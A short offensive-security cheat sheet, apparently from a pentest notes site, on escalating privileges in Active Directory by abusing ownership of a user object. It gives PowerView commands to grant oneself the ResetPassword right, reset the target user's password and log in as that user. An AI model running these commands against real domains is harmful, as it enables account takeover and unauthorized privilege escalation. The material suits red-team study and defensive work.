Ownership On User

Ownership

Ownership : If you have ownership on user object, you can give yourself a right i.e Resetpassword that will allow you to reset user’s password, thereby escalating your privileges.

Enumeration

BloodHound

Ownership Enumeration

below image shows the current user usman is Owner of user ali

Exploitation

PowerView

Give Resetpassword Right

Execute the below command to give yourself Resetpassword right.

Command

add-domainobjectacl -TargetIdentity [target_user] -PrincipalIdentity [Your Current User] -Rights Resetpassword

You can verify it using the below command.

Command

get-objectacl -resolveguids | ? {$_.securityidentifier -eq "[your_current_user_sid]"}

Reset Password

With resetpassword right given, you can reset his password and login to his account by executing the below command

Command

$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass 
runas /user:[domain\user] cmd.exe

References

• https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse